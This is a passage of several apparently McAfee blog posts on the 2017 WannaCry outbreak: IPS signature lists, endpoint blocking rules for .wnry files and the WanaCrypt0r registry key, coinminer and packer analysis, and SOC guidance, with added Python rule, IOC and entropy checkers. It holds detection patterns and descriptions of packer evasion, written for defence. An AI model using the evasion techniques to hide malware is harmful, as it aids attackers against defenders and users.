  • 0x43c0b800—NETBIOS-SS: Windows SMBv1 identical MID and FID type confusion vulnerability (CVE-2017-0143)
  • 0x43c0b400—NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144)
  • 0x43c0b500—NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)
  • 0x43c0b300—NETBIOS-SS: Microsoft Windows SMB Out of Bounds Write Vulnerability (CVE-2017-0146)
  • 0x43c0b900—NETBIOS-SS: Windows SMBv1 Information Disclosure Vulnerability (CVE-2017-0147)

The NSP Research Team has reviewed the information for CVE-2017-0148 and has created the following UDS:

  • NETBIOS-SS: MS17-010 EternalBlue SMB Remote Code Execution
  • NETBIOS-SS: SMB DoublePulsar Unimplemented Trans2 Session Setup Subcommand Request
  • HTTP: Windows Kernel Information Disclosure Vulnerability (CVE-2017-0175)
  • HTTP: Microsoft Windows Edge IE Mixed Content Warnings Bypass Vulnerability (CVE-2017-0064)
  • HTTP: Microsoft Scripting Engine Memory Corruption Vulnerability (CVE-2017-0234)
  • HTTP: Microsoft Scripting Engine Memory Corruption Vulnerability (CVE-2017-0236)

The UDS is available from KB55447 only for registered users. Log in to https://support.mcafee.com to access the article.

 

McAfee Host Intrusion Prevention (HIPS)

McAfee HIPS 8.0 with NIPS Signature 6095 (which will be released on May 16) provides protection against all four of the preceding known variants of WannaCry.

For the interim period, HIPS custom signatures can be created to protect against the encryption of files. Refer to KB89335 for the latest information on these configurations.

Custom Sig #1: WannaCry Registry Blocking Rule

  Use Standard Subrule
  Rule Type = Registry
  Operations = Create, Modify, Change Permissions
  Parameters: include Registry Key
  Registry Key = \REGISTRY\MACHINE\SOFTWARE\WanaCrypt0r
  Executable = *

Custom Sig #2: WannaCry File/Folder Blocking Rule

  Use Standard Subrule
  Rule Type = Files
  Operations = Create, Write, Rename, Change read-only/hidden attributes
  Parameters: include Files
  Files = *.wnry
  Executable = *

 

McAfee Endpoint Protection (ENS) and McAfee VirusScan Enterprise (VSE)

McAfee recommends the following Adaptive Threat Protection configurations to protect against the WannaCry exploit and unknown variants.

 

McAfee Endpoint Security 10.5—Adaptive Threat Protection

McAfee Endpoint Security 10.5 with Adaptive Threat Protection Real Protect & Dynamic Application Containment (DAC) provides protection against known or unknown exploits for WannaCry.

  1. Configure the following setting in the Adaptive Threat Protection—Options policy:

     Rule Assignment = Security (the default setting is balanced)

  2. Configure the following rules in the Adaptive Threat Protection—Dynamic Application Containment policy:

     Dynamic Application Containment—Containment Rules: refer to KB87843, Best Practices for ENS Dynamic Application Containment Rules, and set the recommended DAC rules to “Block” as prescribed.

 

Content Dependent Security Products

McAfee Endpoint Security 10.1, 10.2, and 10.5—Threat Prevention

McAfee Endpoint Security 10.x Threat Prevention with AMCore content Version 2978 or later provides protection against all four of the preceding currently known variants of WannaCry.

 

McAfee VirusScan Enterprise 8.8

McAfee VirusScan Enterprise 8.8 with DAT content 8527 or later provides protection against all four of the preceding currently known variants of WannaCry.

 

McAfee Endpoint Protection (ENS) and McAfee VirusScan Enterprise (VSE) Access Protection proactive measures

The McAfee ENS and McAfee VSE Access Protection rules prevent the creation of the .wnry file. These rules stop the encryption routine, which creates encrypted files with a .wncryt, .wncry, or .wcry extension. With the block against .wnry files in place, separate blocks for the encrypted file types are not necessary.

Use McAfee VSE Access Protection rules:

Rule1:

Rule Type: Registry Blocking Rule
Process to include: *
Registry key or value to protect: HKLM—/Software/WanaCrypt0r
Registry key or value to protect: Key
File actions to prevent: Create key or value.

Rule2:

Rule Type: File/Folder Blocking Rule
Process to include: *
File or folder name to block: *.wnry
File actions to prevent: New files being created

Use McAfee ENS Access Protection rules:

Rule1:

Executable1:

Inclusion: Include
File Name or Path: *

SubRule1:

SubRule Type: Registry key
Operations: Create
Target1:

Inclusion: Include
File, folder name, or file path: *\Software\WanaCrypt0r

SubRule2:

SubRule Type: Files
Operations: Create
Target1:

Inclusion: Include
File, folder name, or file path: *.wnry
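
As an added example (not McAfee's code), the HIPS custom signatures and the VSE/ENS Access Protection rules above can be checked offline by evaluating them against constructed endpoint events; the Event record, the hive aliases and the sample events are assumptions made here, and the operation sets follow the broader HIPS signatures rather than the Create-only ENS rules:

```python
"""Exercise the .wnry / WanaCrypt0r blocking rules from this post against
constructed endpoint events.

Added example, not McAfee code: it re-implements the intent of the HIPS custom
signatures and the VSE/ENS Access Protection rules above (block creation of
*.wnry files and of the WanaCrypt0r registry key, whatever the process) so the
matching logic can be checked offline. The Event record, the hive aliases and
the sample events are assumptions made for this example.
"""
import fnmatch
import ntpath
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Operations blocked, as listed in the two HIPS custom signatures.
FILE_OPS = {"create", "write", "rename", "change_attributes"}
REGISTRY_OPS = {"create", "modify", "change_permissions"}

# Targets from the post: the ransomware's marker files and its registry key
# (the ENS rule spells it *\Software\WanaCrypt0r, so any hive qualifies).
FILE_PATTERNS = ["*.wnry"]
REGISTRY_PATTERNS = [r"*\software\wanacrypt0r", r"*\software\wanacrypt0r\*"]


@dataclass(frozen=True)
class Event:
    kind: str       # "file" or "registry"
    operation: str  # "create", "write", "rename", "modify", "read", ...
    target: str     # file path or registry key as the sensor reported it
    process: str    # acting process; the rules use "*", so it never exempts anything


def normalize_registry_key(key: str) -> str:
    """Lower-case, use backslashes and map the native hive name to HKLM so the
    spellings used in the post (\\REGISTRY\\MACHINE\\SOFTWARE\\WanaCrypt0r,
    HKLM/Software/WanaCrypt0r, *\\Software\\WanaCrypt0r) compare equal."""
    key = key.replace("/", "\\").lower().rstrip("\\")
    for alias in ("\\registry\\machine", "hkey_local_machine"):
        if key.startswith(alias):
            return "hklm" + key[len(alias):]
    return key


def evaluate(event: Event) -> Tuple[str, Optional[str]]:
    """Return ("block", rule name) when a rule fires, else ("allow", None)."""
    if event.kind == "file" and event.operation in FILE_OPS:
        name = ntpath.basename(event.target).lower()
        if any(fnmatch.fnmatchcase(name, p) for p in FILE_PATTERNS):
            return "block", "WannaCry File/Folder Blocking Rule"
    if event.kind == "registry" and event.operation in REGISTRY_OPS:
        key = normalize_registry_key(event.target)
        if any(fnmatch.fnmatchcase(key, p) for p in REGISTRY_PATTERNS):
            return "block", "WannaCry Registry Blocking Rule"
    return "allow", None


def run(events: Iterable[Event]) -> List[Tuple[str, str, Optional[str]]]:
    """Evaluate every event and return (target, decision, rule) triples."""
    return [(e.target, *evaluate(e)) for e in events]


# Constructed sample events (paths and process names are placeholders).
SAMPLE_EVENTS = [
    Event("file", "create", r"C:\Users\alice\Desktop\sample.wnry", "unknown.exe"),
    Event("registry", "create", r"\REGISTRY\MACHINE\SOFTWARE\WanaCrypt0r", "unknown.exe"),
    Event("registry", "modify", "HKLM/Software/WanaCrypt0r", "unknown.exe"),
    Event("file", "read", r"C:\Users\alice\Desktop\sample.wnry", "explorer.exe"),   # reads are not blocked
    Event("file", "create", r"C:\Users\alice\Desktop\report.docx", "winword.exe"),  # ordinary document
]

if __name__ == "__main__":
    for target, decision, rule in run(SAMPLE_EVENTS):
        print(f"{decision:5}  {target}  {rule or ''}")
```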

McAfee ENS Dynamic Application Containment rules triggered by Ransom-WannaCry variants:

  • Executing any child process
  • Accessing user cookie locations
  • Creating files with the .html, .jpg, or .bmp extension
  • Creating files with the .exe extension
  • Modifying users’ data folders
  • Modifying startup registry locations
  • Modifying critical Windows files and registry locations
  • Reading or modifying files on any network location
  • Modifying files with the .bat extension
  • Modifying files with the .vbs extension
  • Creating files with the .bat extension
  • Reading files commonly targeted by ransomware-class malware
  • Creating files on any network location
  • Writing to files commonly targeted by ransomware-class malware
  • Modifying the hidden attribute bit

 

Configure your endpoint security system to protect against file encryption from WannaCry (and future unknown variants)

Customers not using McAfee ENS Adaptive Threat Protection security may not have McAfee-defined content protection against not yet released variants. We recommend configuring repository update tasks with a minimal refresh interval to ensure new content is applied when it is released by McAfee.

Additional protections against the encryption routine can be configured using McAfee VSE/ENS Access Protection rules or McAfee HIPS custom rules. The McAfee VSE and McAfee ENS Access Protection rules and the McAfee HIPS custom signature prevent the creation of the .wnry file, which stops the encryption routine that creates encrypted files with a .wncryt, .wncry, or .wcry extension. With the block against .wnry in place, separate blocks for the encrypted file types are not necessary.

Refer to KB89335 (accessible to registered McAfee customers) for the latest information on these configurations.

 

McAfee Advanced Threat Defense (ATD)

McAfee ATD machine learning can convict a sample on a “medium severity” analysis.

McAfee ATD has observed the following:

Behavior classification:

  • Obfuscated file
  • Spreading
  • Exploitation through shellcode
  • Network propagation

Dynamic analysis:

  • Elicited ransomware behavior
  • Encryption of files
  • Created and executed suspicious scripting content
  • Behaved like a Trojan macro dropper

McAfee ATD observed 22 process operations, including five runtime DLLs, 58 file operations, registry modifications, file modifications, file creations (dll.exe), DLL injections, and 34 network operations.

Further analysis continues on other variants. McAfee is identifying what other behaviors can be extracted to detect future attacks.

 

McAfee Web Gateway (MWG)

McAfee Web Gateway (MWG) is a product family (appliance, cloud, and hybrid) of web proxies that provides immediate protection against WannaCry variants delivered through the web (HTTP/HTTPS) using multiple real-time scanning engines.

Known variants will be blocked by McAfee Global Threat Intelligence (GTI) reputation and antimalware scanning as web traffic is processed through the proxy.

The Gateway Anti-Malware (GAM) engine within MWG provides effective prevention of variants that have not yet been identified with a signature (“zero-day” threats) through its process of behavior emulation, conducted on files, HTML, and JavaScript. Emulators are regularly fed intelligence by machine learning models. GAM runs alongside GTI reputation and antimalware scanning as traffic is processed.

Coupling MWG with ATD allows for further inspection and an effective prevention and detection approach.

 

McAfee Threat Intelligence Exchange (TIE)

McAfee Threat Intelligence Exchange (TIE) further enhances a customer’s security posture. With the ability to aggregate reputation verdicts from ENS, VSE, MWG, and NSP, TIE can quickly share reputation information related to WannaCry with any integrated vector. By providing the ability to use GTI for a global reputation query, TIE also enables integrated products to make an immediate decision prior to execution of the ransomware payload, leveraging the reputation cached in the TIE database.

As one endpoint protects against and detects any related variant and updates the reputation score in TIE, this encompassing approach extends protection by disseminating that information to every endpoint integrated with TIE. The same bidirectional sharing of threat intelligence exists with MWG and NSP. Thus, as a potential threat attempts to infiltrate through the network or web, MWG and NSP provide protection and detection and share this intelligence with TIE to inoculate endpoints, immediately protecting the enterprise with no further execution of the convicted variant on a potential “patient zero” in the environment.

 

 

 

Adylkuzz CoinMiner Spreading Like WannaCry
https://securingtomorrow.mcafee.com/mcafee-labs/adylkuzz-coinminer-spreading-like-wannacry/
Wed, 17 May 2017 22:40:28 +0000

The post Adylkuzz CoinMiner Spreading Like WannaCry appeared first on McAfee Blogs.

The last few days have been very busy for security teams all around the globe due to the nasty ransomware WannaCry, which spread widely using an exploit for a Server Message Block v1 vulnerability (MS17-010) leaked by the ShadowBroker team a few weeks ago. We have reported on this malware in our previous blog and in a few others by our fellow McAfee researchers.

Today we learned that another malware family is using the same exploit to spread itself to vulnerable machines. The malware Adylkuzz is a CoinMiner malware, which means that it employs—without user consent—machine resources to mine coins for virtual currencies. This specific variant was used to mine Monero coins.

This CoinMiner is not a new variant. We have seen samples as old as October 2014, but its usage has increased since April. Online reports mention that this malware has infected machines after a successful exploitation of the MS17-010 vulnerability followed by the installation of the backdoor malware EternalBlue/DoublePulsar.

Adylkuzz has not changed much in all these years, as we can see by comparing the code among the different waves. For example, the following graphs represent code differences between the October 2014 variant and the first wave starting in April this year:

The number of functions that changed was very small:

  • Identical functions: 1,553
  • Matched functions: 18
  • Unmatched functions: 167

The same can be seen between the April variant and the latest samples received:

  • Identical functions: 1,617
  • Matched functions: 0
  • Unmatched functions: 178

Because the malware has not changed and does not contain any code to exploit the SMB v1 vulnerability, we believe that some actor is leveraging the vulnerability by scanning remote hosts using a tool such as Metasploit and installing the CoinMiner malware via the DoublePulsar backdoor. A port of the MS17-010 exploit is already available for Metasploit.

As this is old malware, McAfee has long had detection for it. We detect most of the samples as Packed-GV!<partial_md5> and Raiden detection RDN/Generic.grp.

Customers might also want to follow the generic guidelines for blocking, whenever possible, the network ports used by the exploit (TCP/445 and UDP/137) to avoid further infections.

We will update our readers about this malware as we learn more.

How a Young Cybersecurity Researcher Stopped WannaCry Ransomware in Its Tracks
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybersecurity-researcher-stopped-wannacry-ransomware/
Wed, 17 May 2017 16:05:14 +0000

The post How a Young Cybersecurity Researcher Stopped WannaCry Ransomware in Its Tracks appeared first on McAfee Blogs.

Last Friday, the biggest ransomware attack we’ve seen hit organizations everywhere, impacting more than 150 countries. It shut down a good chunk of Britain’s National Health Service, has earned the attackers $55,000 in bitcoin, and unfortunately, might not be done just yet. However, there’s good news—“WannaCry” is in fact slowing down, and the chance of more machines becoming infected has been seriously reduced. You can thank one 22-year-old British cybersecurity researcher for that, who used his self-assembled IT hub to locate the ransomware’s “kill switch.”

So, what exactly is this “kill switch,” and how did he find it? First, the researcher got a sample of the WannaCry malware from a friend. Using his IT hub, which consists of computer servers, three monitors, and video games, he analyzed the sample and found a vulnerability: the “kill switch.” Basically, he realized the attack was referencing an unregistered domain, a URL at which there isn’t a website. So the researcher registered the domain, which essentially prevented the ransomware from spreading to any new computers from then on. Best of all, this was all done from the comfort of his parents’ home.

This researcher’s story provides us with two reminders. The first being the importance of taking security into your own hands, and how one person can make an impact on security from their home. The second: ransomware, even the worst kinds, can be tackled.

However, to truly take down ransomware, you’ve got to be prepared for it. And even though WannaCry isn’t directly after consumers, ransomware is still a reality consumers have to face, as it continues to grow both in impact and frequency. In fact, the threat has seen a consistent increase throughout the past few years, as the number of ransomware incidents increased to 229 in 2016 from 159 in 2015.

So, for users at home looking to learn how they can fight back, here are a few tips on what to do if a personal ransomware attack ever comes your way:

-Always make sure your devices are backed up. Though ransomware locks your files and demands compensation to give them back, you can avoid paying the ransom if that data is also stored elsewhere. By regularly backing up your devices, you can recover your information if ransomware does strike one day.

-Update everything. Both your operating system and the security program that protects it should always be as up-to-date as possible. New security patches are included with each update, so whenever there’s an update available, take action immediately. And to streamline the process, you can even set up automatic updates so that all software updates itself immediately.

-Don’t pay the ransom. Unless accessing your data is a matter of life or death, don’t give into cybercriminals’ wishes and pay the ransom. There’s no way to be sure that you will be given the decryption keys by the criminals who locked your device. Instead, consider removal tools, and reach out to your cybersecurity company for help.

-Cover your devices with comprehensive security. To protect your phone, computer, and all other personal devices from infection, cover them with an extra layer of security and use a comprehensive security solution like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

What WannaCry Means for the SOC
https://securingtomorrow.mcafee.com/business/optimize-operations/what_wannacry_means_soc/
Wed, 17 May 2017 15:38:39 +0000

The post What WannaCry Means for the SOC appeared first on McAfee Blogs.

In addition to the endpoint and network operational efforts for WannaCry, this outbreak presents great learning and response opportunities for analysts in the security operations center (SOC). Understanding and automating these best practices will set you up to handle evolving WannaCry activities, as well as the next fast-moving attack.

Responding to an attack like WannaCry, the SOC must answer three key questions:

1. First Question – Am I affected?

The first process for a SOC is to assess what you have already experienced and gain current situational awareness. This evaluation can come from reports on endpoint and network security events related to the attack, from within the malware, and from the SIEM. In the McAfee ecosystem, here is what you can do:

  1. Report on Endpoint events. McAfee ePolicy Orchestrator can report out events based on the signatures it has downloaded from McAfee Global Threat Intelligence.
  2. Conduct Malware analysis. Sandboxing systems like McAfee Advanced Threat Defense can generate reports on unknown variants and share in machine-readable form as a STIX file.
  3. Perform Automated searching. Leveraging integrations provided by McAfee, IOC data from sandboxes and other sources can be used to immediately mine endpoints (via McAfee Active Response) and the SIEM database (via McAfee Enterprise Security Manager) for related activity. If an event containing an IOC is present in the SIEM database, it can indicate other hosts that are in the process of being locked, hosts connecting to malicious IP addresses or domains related to WannaCry, and related indicators that your own hunters may want to pursue as part of their containment efforts.
  4. Perform Manual IOC searches. Other sources of intelligence, such as external CERT notices, can also be used for ad hoc searching using McAfee Active Response.

Figure: Multi-engine analysis by McAfee Advanced Threat Defense shows the scope of malicious behavior in a WannaCry

2. Second Question – Is there new activity?

Proactive analysis and hunting using analytics and intelligence allows SOC staff to be on constant vigil for activity related to known WannaCry behaviors, and trigger an action – from active quarantine to a policy-driven scan to an email or SMS alert to drive incident responders. Here’s what you can do in the McAfee ecosystem:

  1. Enable Analytics-driven monitoring of events and behaviors. IOCs ingested by the SIEM can populate a watchlist for ongoing, forward-looking monitoring for new occurrences. In addition, endpoint trace data sent by McAfee Active Response is monitored in the cloud for behaviors that are indications of WannaCry activities (persistence, stealth, recon, self-protection, data stolen, signal infection).
  2. Enhance Human investigations. The Active Response threat workspace presents endpoint event findings from the cloud in a dynamic dashboard that can help you drill down and explore event relationships. Similarly, SIEM shows new events in the context of the overall estate, including user context, network flow data, and more.
  3. Conduct Manual IOC searches. In the case of WannaCry, indicators of compromise (IOCs) are publicly available from several sources, including US-CERT. So in addition to the discoveries within your environment shared by your internal sandbox, you should also be consuming and evaluating these third-party intelligence sources to get the most complete picture of known WannaCry behaviors. When new intelligence emerges from third-party or local sources, it can trigger ad hoc searching using McAfee Active Response.
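
One way to turn a sandbox STIX export into a SIEM watchlist and mine events with it, as the first two questions above describe; this is an added example, not McAfee code and not any McAfee product API, and the bundle, the log format and every indicator value are constructed placeholders:

```python
"""Build a watchlist from sandbox-exported STIX 2.1 indicators and run it over
SIEM-style events, as the first and second SOC questions above describe.

Added example, not McAfee code and not tied to any McAfee product API: the post
says ATD can export findings as a STIX file, that the SIEM can be mined for
matching events, and that ingested IOCs should stay on a watchlist. The bundle,
the log lines and every indicator value below are constructed placeholders
(RFC 5737 test addresses, .example domains, a dummy hash), not WannaCry IOCs.
"""
import json
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Simple STIX comparison expression: [<object-type>:<property> = '<value>']
PATTERN_RE = re.compile(r"\[([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'\]")

# Which (object type, property) pairs the watchlist understands.
KIND_MAP = {
    ("domain-name", "value"): "domain",
    ("ipv4-addr", "value"): "ip",
    ("file", "hashes.'SHA-256'"): "sha256",
}

# Which event fields are compared against which watchlist category.
FIELD_TO_KIND = {"query": "domain", "dst": "ip", "sha256": "sha256"}

DUMMY_SHA256 = "0123456789abcdef" * 4  # constructed, not a real sample hash

# Constructed minimal STIX 2.1 bundle standing in for a sandbox export.
STIX_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--11111111-1111-4111-8111-111111111111",
    "objects": [
        {"type": "indicator", "id": "indicator--22222222-2222-4222-8222-222222222222",
         "pattern_type": "stix", "pattern": "[domain-name:value = 'indicator-one.example']"},
        {"type": "indicator", "id": "indicator--33333333-3333-4333-8333-333333333333",
         "pattern_type": "stix", "pattern": "[ipv4-addr:value = '198.51.100.23']"},
        {"type": "indicator", "id": "indicator--44444444-4444-4444-8444-444444444444",
         "pattern_type": "stix", "pattern": f"[file:hashes.'SHA-256' = '{DUMMY_SHA256}']"},
        # A port comparison is not an atomic watchlist value, so it is reported as skipped.
        {"type": "indicator", "id": "indicator--55555555-5555-4555-8555-555555555555",
         "pattern_type": "stix", "pattern": "[network-traffic:dst_port = 445]"},
    ],
})

# Constructed SIEM-style events: "<timestamp> key=value ...".
SAMPLE_LOG = [
    "2017-05-14T10:02:11Z host=WS-0412 event=dns query=indicator-one.example",
    "2017-05-14T10:02:13Z host=WS-0412 event=netflow dst=198.51.100.23 dport=445",
    f"2017-05-14T10:03:40Z host=SRV-FILE01 event=file_create sha256={DUMMY_SHA256} path=C:/Temp/sample.bin",
    "2017-05-14T10:04:02Z host=WS-0099 event=dns query=intranet.corp.example",
]


def extract_indicators(bundle_json: str) -> Tuple[Dict[str, Set[str]], List[str]]:
    """Parse indicator patterns into a watchlist; return it plus the ids of
    indicators whose pattern is not a single supported equality comparison."""
    watchlist: Dict[str, Set[str]] = {kind: set() for kind in set(KIND_MAP.values())}
    skipped: List[str] = []
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator":
            continue
        match = PATTERN_RE.fullmatch(obj["pattern"].strip())
        kind = KIND_MAP.get((match.group(1), match.group(2))) if match else None
        if kind is None:
            skipped.append(obj["id"])
            continue
        watchlist[kind].add(match.group(3).lower())
    return watchlist, skipped


def parse_event(line: str) -> Dict[str, str]:
    """Split '<ts> k=v k=v' into a dict (values are kept verbatim)."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = ts
    return fields


def match_events(lines: List[str], watchlist: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (host, kind, value) for every event field that hits the watchlist."""
    hits = []
    for line in lines:
        event = parse_event(line)
        for field, kind in FIELD_TO_KIND.items():
            value = event.get(field, "").lower()
            if value and value in watchlist[kind]:
                hits.append((event["host"], kind, value))
    return hits


def hosts_of_concern(hits: List[Tuple[str, str, str]]) -> Dict[str, Set[Tuple[str, str]]]:
    """Group hits by host: the candidates for containment or a hunter's follow-up."""
    by_host: Dict[str, Set[Tuple[str, str]]] = defaultdict(set)
    for host, kind, value in hits:
        by_host[host].add((kind, value))
    return dict(by_host)


if __name__ == "__main__":
    wl, unsupported = extract_indicators(STIX_BUNDLE)
    for host, found in hosts_of_concern(match_events(SAMPLE_LOG, wl)).items():
        print(host, sorted(found))
    print("unsupported patterns:", unsupported)
```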

3. Final Question – Am I maintaining protection?

Many tools today can be updated with new IOCs, signatures, and policy-driven updates and actions. This video of OpenDXL and a threat intelligence platform shows one way that this process can be managed. McAfee ePolicy Orchestrator integrations can take action on a variety of endpoint systems, including Security Innovation Alliance integrated partners.

Rapidly spreading malware like WannaCry should be a further spur to SOC teams to improve their access to and use of the intelligence so readily available today. The good news for SOC staff is that many functions that should be performed can be automated, freeing you to do the investigation and extrapolation that only humans can drive. For ideas, please check out these blogs on automation and threat hunting.

Malware Packers Use Tricks to Avoid Analysis, Detection
https://securingtomorrow.mcafee.com/technical-how-to/malware-packers-use-tricks-avoid-analysis-detection/
Wed, 17 May 2017 05:29:18 +0000

The post Malware Packers Use Tricks to Avoid Analysis, Detection appeared first on McAfee Blogs.

Malware authors use a number of tricks to avoid detection and analysis. One of the most popular methods is to employ a packer, a tool that compresses, encrypts, and/or modifies a malicious file’s format. (Packers can also be used for legitimate ends, for example, to protect a program against cracking or copying.) All these tricks decrease the chance of detection by antimalware products and help to avoid analysis by security researchers.

Packers can both make it harder for security staff to identify the behavior of malware and increase the amount of time required for an analysis. Unpacking malware is the first challenge to understanding a threat. The complexity of packers varies.

 

Types of packers

A packer can act simply as armor to protect the binary. It is more convenient for attackers to use a packer than to implement protection directly inside the code. Advanced malware coded by organized cybercriminal groups, however, employs custom packers or implements complex protection inside malicious files.

For packers that encrypt or compress a file, a stub (a piece of code that contains the decompression or decryption routine) acts as a loader, which executes before the malware.

A packer compresses or encrypts data. The original file is passed through the packer routine and stored in a packed section of the new .exe. Once the file runs, the decompression stub stored in the packed file decompresses the packed section, and the original .exe is then loaded into memory.

In these cases the original entry point, the memory address where the program starts, is relocated into the packed section. The analyst has to retrieve it to recover the original file.
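
An added example (not code from the post) of spotting the packed-section pattern just described: parse the PE section table and flag an entry point that lives in a high-entropy section; the sample images are built in memory, and the 7.0 bits-per-byte threshold is a common rule of thumb, not a McAfee value:

```python
"""Flag a PE image whose entry point sits in a high-entropy section, the
tell-tale of the compressing/encrypting packers described above.

Added example, not code from the post: a minimal PE section-table parser plus a
Shannon-entropy check. The sample executables are constructed in memory by
build_sample_pe, so nothing real is scanned; the 7.0 bits-per-byte threshold is
a common rule of thumb, not a McAfee value.
"""
import math
import random
import struct
from typing import Dict, List, Tuple

ENTROPY_THRESHOLD = 7.0  # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for a constant byte, up to 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> Tuple[int, List[dict]]:
    """Return (AddressOfEntryPoint, section records) read from the PE headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    file_hdr = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", pe, file_hdr + 16)[0]
    opt_hdr = file_hdr + 20
    entry_rva = struct.unpack_from("<I", pe, opt_hdr + 16)[0]
    sections = []
    for i in range(n_sections):
        off = opt_hdr + opt_size + 40 * i
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, off)
        raw = pe[rptr:rptr + rsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "entropy": shannon_entropy(raw)})
    return entry_rva, sections


def assess(pe: bytes) -> Dict[str, object]:
    """Find the section owning the entry point and judge whether the image looks
    packed, i.e. the entry point was relocated into a high-entropy section."""
    entry_rva, sections = parse_sections(pe)
    owner = next((s for s in sections
                  if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], 1)), None)
    packed = owner is not None and owner["entropy"] >= ENTROPY_THRESHOLD
    return {"entry_section": owner["name"] if owner else None,
            "entry_entropy": owner["entropy"] if owner else None,
            "high_entropy_sections": [s["name"] for s in sections
                                      if s["entropy"] >= ENTROPY_THRESHOLD],
            "likely_packed": packed}


def build_sample_pe(packed: bool) -> bytes:
    """Construct a minimal PE32 image (a constructed sample, not a real binary):
    one code section of low-entropy filler, or one pseudo-random "packed" section
    that also holds the entry point, mimicking a relocated original entry point."""
    rng = random.Random(1)
    body = (bytes(rng.getrandbits(8) for _ in range(4096)) if packed
            else bytes([0x90, 0xC3, 0x55, 0x8B]) * 1024)
    name = b".packed" if packed else b".text"
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)  # e_lfanew at offset 0x3C
    dos += b"\0" * (0x80 - len(dos))
    opt_size = 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000 + 0x10)  # AddressOfEntryPoint inside the section
    raw_ptr = 0x80 + 4 + 20 + opt_size + 40          # section data follows the headers
    sec = struct.pack("<8sIIIIIIHHI", name, len(body), 0x1000, len(body), raw_ptr,
                      0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + sec + body


if __name__ == "__main__":
    for label in (False, True):
        print("packed sample" if label else "plain sample", assess(build_sample_pe(label)))
```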

Other packers act as a proxy and protect the import address table (IAT). The IAT references the Windows API functions a program uses. At runtime the IAT is resolved dynamically and used by the program as necessary. This protection increases the difficulty of unpacking the malware: a memory dump does not work because the IAT is not complete, and without the IAT it is more difficult to analyze the malware correctly because it cannot be properly disassembled.

A packer obfuscating an API. The packer stub acts as a proxy and intercepts every call to the API. The call is translated from the API to the stub and is run by the payload.

In such cases, a malware analyst must fix the imports by locating each function and tracing the return routine. A stub redirects execution to the original API; in some cases, the address of the API is located in the EIP register.

Still other techniques virtualize the code and emulate the behavior of a processor to run the original file. This adds an abstraction layer between the executed code and its behavior: the original code is translated into the bytecode of the virtual machine. This technique is one of the most difficult to analyze.

A code virtualization packer. The original file shows x86 assembly when reversed. Once the file is protected, the reversed code will be in the virtual machine’s bytecode.

To remove this kind of protection, a malware analyst must study the behavior and the byte code of the virtual software to retrieve and analyze the original file.

Other packers combine techniques such as anti-debugging or anti-sandbox checks and add more functions to protect the malware. Some malware uses several layers to protect itself against detection and analysis; to analyze it we must remove each layer until we recover the original file. The fastest recovery technique is to run the malware and dump it directly from memory, but this can be difficult because some packers add anti-dumping tricks.

Packers remain an effective way to slow down analysis and decrease detection by antimalware products. They are also the favorite tool of attackers for protecting malware. Nevertheless, manual analysis usually defeats packers.

Six Steps to Mastering Modern Endpoint Security
https://securingtomorrow.mcafee.com/business/dynamic-endpoint/six-steps-mastering-modern-endpoint-security/
Tue, 16 May 2017 21:00:15 +0000

The post Six Steps to Mastering Modern Endpoint Security appeared first on McAfee Blogs.

Organizations have added layer after layer of defense to stay ahead of the latest cyberattacks. In theory, they should be better protected. Instead, security teams are drowning in tools and interfaces. According to the 2017 Forrester report Mastering the Endpoint, organizations now monitor 10 different security agents on average and swivel between at least five different interfaces to investigate and remediate incidents.

There’s a way to get ahead with fresh thinking about endpoint security. Drawing on real-world experiences from more than 250 security decision makers along with insights from Forrester and McAfee, here are six essential steps for mastering the modern endpoint, and protecting the enterprise both today, and tomorrow.

  1. Build a security framework that scales and adapts to the changing threat landscape.

The concept of adding multiple layers of defense is widely accepted, but the key to gaining the most value out of these layers is connecting them using a flexible, adaptive security framework. By implementing defense layers that communicate with one another, you achieve greater efficiency and efficacy. The ideal framework is extensible, allowing you to continually add new layers to the fabric as business and security requirements change.

  2. Integrate detection and response capabilities into everyday operations.

Administrators need the ability to quickly follow the tracks of a threat and clean up everything it touches. Unfortunately, those capabilities are typically limited to specialized investigators, and there just aren’t enough of them to go around. Adding yet another disparate investigation suite won’t solve this problem. By implementing a solution that integrates detection and response capabilities into everyday endpoint operations, front-line administrators can respond quickly when infections inevitably hit.

  3. Minimize false positives so you can focus more on critical tasks.

Defenses that share threat intelligence can automatically validate or exonerate a potential threat, so human administrators don’t have to. By eliminating layers of complexity and manual effort, front-line security teams are empowered to cut through the noise and respond faster. Create even more focus by automatically surfacing the highest-priority incidents and provide a clear workflow for resolution.

  4. Share threat intelligence in real time and immediately apply the learnings.

